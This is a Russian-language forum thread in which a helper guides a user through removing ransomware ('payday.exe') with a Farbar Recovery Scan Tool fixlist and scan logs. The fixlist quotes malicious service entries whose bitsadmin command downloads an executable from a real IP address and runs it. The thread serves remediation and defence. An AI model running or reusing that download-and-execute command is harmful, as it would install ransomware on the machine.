bartleby Опубликовано 20 июня, 2018 Опубликовано 20 июня, 2018 (изменено) Добрый день Поймали шифровальщика Шифрование началось ночью примерно в 3 часа и к утру большая часть файлов была зашифрована Примеры зашифрованных файлов, файлов readme.txt и логи прилагаю Спасибо FRST.txt Addition.txt Shortcut.txt files.zip README.zip CollectionLog-2018.06.20-13.07.zip Изменено 20 июня, 2018 пользователем bartleby
bartleby Опубликовано 20 июня, 2018 Автор Опубликовано 20 июня, 2018 Прикрепил лог к исходному сообщению
thyrex Опубликовано 20 июня, 2018 Опубликовано 20 июня, 2018 C:\payday.exe или C:\7061996461992E657865 есть на компьютере?
thyrex Опубликовано 20 июня, 2018 Опубликовано 20 июня, 2018 Печально. Это похоже и есть шифратор. Его нет даже на исходном сервере. Пробуйте с помощью программ восстановления данных, которые нужно установить на несистемный диск, поискать файл среди удаленных. Такой файл C:\Users\Администратор\AppData\Local\Temp\{3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}.cmd тоже отсутствует? + 1. Откройте Блокнот и скопируйте в него приведенный ниже текст CreateRestorePoint: HKLM-x32\...\RunOnce: [{3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}] => cmd.exe /C start /D "C:\Users\A5A32~1.PEK\AppData\Local\Temp" /B {3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}.cmd Handler: ms-help - {314111c7-a502-11d2-bbca-00c04f8ec294} - No File S2 BvWn; cmd /c bitsadmin /transfer wcb /priority high http://81.177.140.58/payday.exe C:\payday.exe && C:\payday.exe S2 eINJ; cmd /c bitsadmin /transfer wcb /priority high http://81.177.140.58/payday.exe C:\payday.exe && C:\payday.exe <==== ATTENTION S2 WbZa; cmd /c bitsadmin /transfer wcb /priority high http://81.177.140.58/payday.exe C:\payday.exe && C:\payday.exe S2 Googler; C:\Windows\System32\nssm.exe [121344 2017-11-15] () [File not signed] C:\Windows\System32\nssm.exe 2. Нажмите Файл – Сохранить как3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool 4. Укажите Тип файла – Все файлы (*.*) 5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить 6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: перезагрузку компьютера нужно выполнить вручную.
bartleby Опубликовано 20 июня, 2018 Автор Опубликовано 20 июня, 2018 Такой файл C:\Users\Администратор\AppData\Local\Temp\{3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}.cmd тоже отсутствует? Конкретно такого нету.. есть папка похожего вида но другое имя и пустая.
thyrex Опубликовано 20 июня, 2018 Опубликовано 20 июня, 2018 Пробуйте выполнять поиск payday.exe и 7061796461992E657865 среди удаленных А потом фикс в Farbar
bartleby Опубликовано 20 июня, 2018 Автор Опубликовано 20 июня, 2018 Система была проверена KVRT лог приложить не дает На скрине то что он нашел Пробуйте выполнять поиск payday.exe и 7061796461992E657865 среди удаленных А потом фикс в Farbar Сканирую систему по результату отпишусь
thyrex Опубликовано 20 июня, 2018 Опубликовано 20 июня, 2018 Последний файл выложите в архиве с паролем virus на sendspace.com и пришлите ссылку мне в ЛС
thyrex Опубликовано 20 июня, 2018 Опубликовано 20 июня, 2018 В скрипт в сообщении №6 внесены изменения. Выполните его.
bartleby Опубликовано 20 июня, 2018 Автор Опубликовано 20 июня, 2018 лог загрузил перегружать машину надо? Fixlog.txt
bartleby Опубликовано 20 июня, 2018 Автор Опубликовано 20 июня, 2018 Готово. Лог в 13 сообщении. машину перегрузил
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти